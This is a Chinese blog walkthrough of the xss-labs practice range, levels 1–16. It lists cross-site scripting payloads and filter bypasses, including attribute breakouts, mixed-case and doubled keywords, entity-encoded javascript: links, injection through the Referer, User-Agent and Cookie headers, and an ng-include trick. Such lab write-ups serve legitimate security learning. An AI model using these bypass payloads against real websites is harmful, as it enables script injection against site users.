xsslabs11

最新推荐文章于 2024-11-08 15:41:32 发布
最新推荐文章于 2024-11-08 15:41:32 发布
阅读量244 收藏 1
点赞数
分类专栏: CTF 文章标签: 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52062236/article/details/124356298
版权

1-9

No.Answer
[1]<script>alert(1)</script>
[2]"><script>alert(1)</script>"><img src=# onerror=alert(/xss/)>
[3].' onmousemove='alert(1)
[4]" onmousemove="alert(1)
[5]."><a href=javascript:alert(1)>xss</a>
[6]." ONmousemove="alert(1)"><a HrEf=javascript:alert(1)>xss</a>"><img Src=# onerror=alert(1)>
[7]"><a hrehreff=javascrscriptipt:alert(1)>xss</a>" oonnmousemove="alert(1)
[8]&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;即javascript:alert(1)
9&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;(1)//http://

10

查看网页源码,有三个隐藏标签,删除标签中的hidden: ?t_sort=" onmousemove="alert(1)

11referer

?keyword=<script>alert(1)</script>
在这里插入图片描述
可以判断,使用了字符实体编码处理,不会弹窗的,另觅他径。

查看源代码,发现一个表单,和四个被hidden的input标签;取消hidden,输入1之后,再次查看源代码
在这里插入图片描述
在这里插入图片描述
据此判断第四个标签的value值是获取请求头的referer字段,可以用于xss
抓包修改请求头的referer字段,闭合标签就行。

Answer : " οnmοusemοve="alert(1)

12ua

在这里插入图片描述
显而易见,这题变成User-Agent,直接改成Answer就行
Answer : " οnmοusemοve="alert(1)

13cookie

在这里插入图片描述
这题稍微有些变化,因为cookie需要携带,才能正常访问
将cookie值改为:user=call+me+maybe%3F" οnmοusemοve="alert(1)

15

在这里插入图片描述
ng-include是angular js中的东西,其作用相当于php的include函数。这里就是将1.gif这个文件给包含进来。
提交的参数被插入了<span>标签的class 属性,使用了字符实体编码,无法通过闭合标签绕过。

此处用了ng-include指令的话,先了解一下其具体的用法。

  1. ng-include 指令用于包含外部的 HTML文件。
  2. 包含的内容将作为指定元素的子节点。
  3. ng-include 属性的值可以是一个表达式,返回一个文件名。
  4. 默认情况下,包含的文件需要包含在同一个域名下。

特别值得注意的几点如下:

  1. ng-include,如果单纯指定地址,必须要加引号
  2. ng-include,加载外部html,script标签中的内容不执行
  3. ng-include,加载外部html中含有style标签样式可以识别

既然这里可以包含html文件,那么也就可以包含之前有过xss漏洞的源文件
?src='level1.php?name=<img src=1 onerror=alert(1)>'

level16

源码:

<?php 
	ini_set("display_errors", 0);
	$str = strtolower($_GET["keyword"]);
	$str2=str_replace("script","&nbsp;",$str);
	$str3=str_replace(" ","&nbsp;",$str2);
	$str4=str_replace("/","&nbsp;",$str3);
	$str5=str_replace("	","&nbsp;",$str4);
	echo "<center>".$str5."</center>";
?>
  • 绕过思路:可以用回车(%0a)来将它们分开。而且这里/符号也被编码了,所以我们需要的是一个不需要闭合的标签

Answer : ?keyword=<img%0Asrc="1"%0Aonerror=alert(1)>

17—

下面几个好像是关于flash的,没什么做的兴趣了,就酱紫

Vin0sen
关注
专栏目录
XSS-lab靶场(11~15)
bin789456的博客
05-26 361
Level 11 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>没有找到和".htmlspecial
Xss-labs(1)第一关到第十一关
m0_46412408的博客
09-25 770
Xss-labs靶场训练第一关:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二关,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一关是闭合绕过来到第三关,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
XSS攻击-xss-lab11-20)详细讲解
qq_43395215的博客
05-06 2582
xss注入与sql注入有很多相似之处,如果有sql学习的基础,那么学习xss将会很轻松,xss注入的方法总的来说就方面,一方面从js脚本入手,如果js方面的防御机制,可以考虑绕过,或者选择html的标签中的事件属性注入,本文并没有涉及flash xss攻击,flash xss会作为单独一章,而且也没有涉及存储型xss攻击,关于存储型xss会在dvwa中讲到 第11关: 这一关与上一关一样,需要盲猜...
xss-labs通关攻略教程(level11~level 20)
m0_55854679的博客
07-24 2545
xss-labs通关攻略教程(level1~level 10) level 11——Referer信息 在url处提交测试代码并查看源码 javascript:alert('xss') 查看服务器端源码 在服务器端还将请求头中的referer头的值赋给了str11这个变量,再将变量值中的<和>删除之后就会插入到t_ref这个标签的value属性值中。而上一关的t_sort标签虽然也能接收并显示参数值,但是这个参数值是要用htmlspecialchars()函数处理的。 使用burp抓包
xss-labs 11-18通关攻略
Alexz__的博客
03-17 889
http://alexzspace.cn/?p=144
xsslabs.zip
07-23
"xsslabs.zip" 是一个由国内知名安全专家开放的XSS漏洞靶场,为网络安全从业者和爱好者提供了一个实战学习和测试XSS攻击方法的平台。通过这个靶场,我们可以深入了解XSS的类型、攻击方式以及如何有效地进行防护。 ...
PHP、Apache环境中部署xsslabs(XSS跨站脚本攻击靶场)
01-08
下面是部署xsslabs的详细步骤和相关知识点: 1. 环境安装 在开始部署xsslabs之前,需要安装PHP和Apache环境。PHPStudy是一个集成了PHP、Apache、MySQL等多种服务的集成开发环境,非常适合开发和测试环境。可以根据...
XSSLab (1~10)
开心星人的博客
05-14 327
一 http://test.ctf8.com/level1.php?name=<script>alert(1)</script> 二 输入<script>alert(1)</script> 查看源码看到<input name=keyword value="<script>alert(1)<script>"> 构造 " onclick="alert(1) 三 输入" onclick="alert(1) 查看源码看到<i
xss-labs通关详解 Level 11-15
qq_41755084的博客
10-26 1291
这一关比上一关多了一个标签,其他没有变化,先试一下上一关的注入语句。发现在t_sort的标签中的"被编码成了html实体字符,没办法正常闭合了。而t_ref的值看起来像是请求的referer头。那我们将上一关的代码从referer头处传入。页面中出现了输入框,点击该输入框,弹窗成功。
XSSxss-labs-level11
Hugu
02-24 537
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
软件安全实验——lab11XSS跨站脚本攻击)
Onlyone_1314的博客
08-16 5976
目录标题一级目录二级目录1、概述2、实验室环境3、实验室的任务3.1任务1:发布恶意消息以显示警报窗口3.2任务2:发送恶意信息显示cookie3.3任务3:从受害者的机器上偷取cookies3.4任务4:用偷来的cookie冒充受害者3.5任务5:编写跨站蠕虫3.6任务6:编写自传播跨站蠕虫4、提交 一级目录 二级目录 1、概述 跨站脚本(XSS)是 web应用程序中常见的一种漏洞。该漏洞使得攻击者有可能将恶意代码(如 JavaScript程序)注入受害者的网络浏览器。使用这种恶意代码,攻击者可以窃取受
XSSlabs通关手册
04-25
XSSlabs通关手册详细介绍了如何利用和防止这类攻击。 在Level 1,我们了解到基础的XSS注入方式,即直接在URL参数中插入JavaScript代码,例如`<script>alert(1)</script>`。然而,这种直白的尝试通常会被服务器端的...
XSSLabs Less1-10
qq_45785324的博客
08-01 934
XSSLabs Less1-10 通关教程
Webserver(3.3)生产者消费者模型
学习历程记录和分享
11-05 361
解决该问题需要用互斥量确保线程同步,用条件变量或者信号量去解决生产者和消费者之间同步的问题,生产者把数据生产满了要通知消费者去消费。会产生数据安全问题,比如生产者还未生产出来,就去消费。
vxe-grid ,增加新行,并且定位到新增的行
花花鱼的专栏
11-05 225
vxe-grid新增空行,并且定位到空行位置。
WPF+MVVM案例实战与特效(二十五)- 3D粒子波浪效果实现
lingshuangcanxue
11-05 298
使用WPF的3D控件以及动画效果实现3D粒子波浪的特效
vue2 -- el-form组件动态增减表单项及表单项验证
King Saj
11-06 113
在数据录入场景(如订单信息录入)中,可根据实际情况(如商品种类增加)动态添加表单项(如商品相关信息)。包含必填项验证和数据格式验证(如邮箱、电话格式),防止错误数据提交。// 此处执行错误的逻辑。// 执行父组件回调。
vue前端进行AES加密,JAVA对其进行AES解密
Ls66666Ls的博客
11-04 263
【代码】vue前端进行AES加密,JAVA对其进行AES解密。
vue种ref跟reactive的区别?
renqq001的博客
11-07 583
vue种ref跟reactive的区别?
【JavaEE进阶】导读
最新发布
2401_83227065的博客
11-08 787
随着技术的发展, ⽆论是后端开发还是前端开发, 开发的时候都很少使⽤原⽣的代码,⽐如:JDBC、JS 等. 取⽽代之的是各种开发框架. 如:后端框架:Spring, SpringBoot, Mybatis等,前端常⽤的框架: Vue、Node等. 这些框架都有⼀个共同的特点, 就是简单, ⾼效. 这极⼤的提⾼了我们的开发效率. 那什么是框架呢?通俗的来讲: 框架是实现某种功能的半成品, 他提供了⼀些常⽤的⼯具类, 我们在框架的基础上, 可以更加⾼效的进⾏开发.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值